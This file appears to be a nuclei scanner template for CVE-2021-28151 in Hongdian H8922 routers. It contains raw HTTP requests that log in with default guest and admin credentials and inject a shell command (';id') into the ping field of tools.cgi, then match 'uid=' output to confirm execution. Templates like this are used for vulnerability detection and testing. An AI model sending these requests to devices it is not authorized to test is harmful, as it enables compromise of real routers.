nuclei-templates/cves/2021/CVE-2021-28151.yaml

57 lines
1.4 KiB
YAML

id: CVE-2021-28151
info:
name: Hongdian Command Injection
author: gy741
severity: high
description: |
Hongdian H8922 3.0.5 devices allow OS command injection via shell metacharacters into the ip-address (aka Destination) field to the tools.cgi ping command, which is accessible with the username guest and password guest.
reference:
- https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2021-28151
tags: cve,cve2021,hongdian,rce,injection
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.80
cve-id: CVE-2021-28151
cwe-id: CWE-78
requests:
- raw:
- |
POST /tools.cgi HTTP/1.1
Host: {{Hostname}}
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Origin: {{BaseURL}}
Referer: {{BaseURL}}/tools.cgi
op_type=ping&destination=%3Bid
- |
POST /tools.cgi HTTP/1.1
Host: {{Hostname}}
Authorization: Basic YWRtaW46YWRtaW4=
Origin: {{BaseURL}}
Referer: {{BaseURL}}/tools.cgi
op_type=ping&destination=%3Bid
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "text/html"
part: header
- type: word
words:
- "uid="
- "gid="
- "groups="
part: body
condition: and